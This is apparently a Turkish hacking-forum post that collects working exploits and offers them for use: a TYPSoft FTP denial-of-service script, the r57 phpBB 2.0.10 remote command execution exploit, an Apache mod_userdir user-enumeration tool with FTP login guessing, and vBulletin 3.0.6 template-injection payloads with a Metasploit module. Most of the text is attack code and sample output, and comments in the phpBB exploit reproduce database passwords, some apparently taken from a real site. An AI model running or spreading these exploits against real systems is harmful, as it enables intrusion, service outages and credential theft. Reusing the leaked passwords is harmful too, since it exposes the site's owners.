TYPSoft FTP Server Exploits
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
PhpBB 2.0.10 ExpLoiti
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Apache 1.3 Exp
Bu C exploitidir shellde derlenebilir
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
3.0.6 kalmadı piyasada ama genede verdim lazım olur belki 
Kod:
--------------------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";
print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die
"Error: cant send error code\n";
print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
# Chaglar// hackhell.com
active perl cd:
perl saldiri.plPhpBB 2.0.10 ExpLoiti
Kod:
#!/usr/bin/perl
use IO::Socket;
## phpBB <= 2.0.10 remote commands exec exploit
## based on
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com (http://www.phpbb.com) /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com (http://www.phpbb.com) /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru (http://www.rst.void.ru)
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com (http://www.phpbb.com)
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###Apache 1.3 Exp
Kod:
* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archi...00-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
*
Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
*
Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
*
Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
*
Searching complete.
* 12 users checked
* 2 users found
*
Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
*
Complete.
* 0 ftp accounts found
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("\n
Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n
Downloaded on <A href="http://www.k-otik.com/n/n");" target=_blank>www.K-OTIK.com\n\n");
}
int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}
int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}
int attempt(char *argv);
int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}
int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;
char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;
m00();
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}
if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }
if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}
if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}
logz = (char **)malloc(0x666);
printf("
Checking http server [%s:%i]...\n",host,port);
hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);
hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);
printf("\n
Searching for system accounts...");
if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}
x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;
printf("\n %s \t=> ",buf);
hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n
Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf("
Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);
sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf("
Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}
}>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Kod:
www.hedefsite.com/forum/install/upgrade1.php
-----3.0.6------
1-)# vBulletin 3.0.6 da test edılmsıtır.
# http://www.hedefsite.net/misc.php?do=page&template={${system(id)}}
#
example :
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
####################################################################################
2-)##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
'Refs' =>
[
['MIL', '832'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['vBulletin'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Sending the malicious vBulletin Get request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
####################################################################################